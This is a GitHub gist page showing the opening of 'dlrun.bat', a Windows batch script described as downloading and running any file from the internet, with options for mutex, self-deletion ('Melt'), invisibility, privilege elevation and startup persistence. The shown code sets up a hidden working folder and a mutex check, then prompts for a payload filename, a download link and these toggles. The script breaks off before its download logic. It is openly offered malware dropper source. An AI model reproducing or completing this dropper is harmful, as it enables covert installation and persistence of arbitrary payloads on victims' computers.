Skip to content

Instantly share code, notes, and snippets.

View harr-will's full-sized avatar

Harrison Williamson harr-will

View GitHub Profile
@harr-will
harr-will / dlrun.bat
Created December 29, 2016 16:50 — forked from Avendyke/dlrun.bat
This batch script will download and run any file from the internet. Includes Mutex, Melt, Invisify, Elevate, and Add to Startup options.
:: Prepare Script
@echo off & cd "%localappdata%" & if exist i.db exit & set N=1
:: Define Parameters
echo Specify Filename and Extension.& set /p "i1=" & cls
echo Specify Direct Download Link. & set /p "i2=" & cls
echo Run file on Startup? [Y/N] & set /p "i3=" & cls
echo Enable Mutex? [Y/N] & set /p "i4=" & cls
echo Enable Elevation? [Y/N] & set /p "i5=" & cls
echo Enable Invisibility? [Y/N] & set /p "i6=" & cls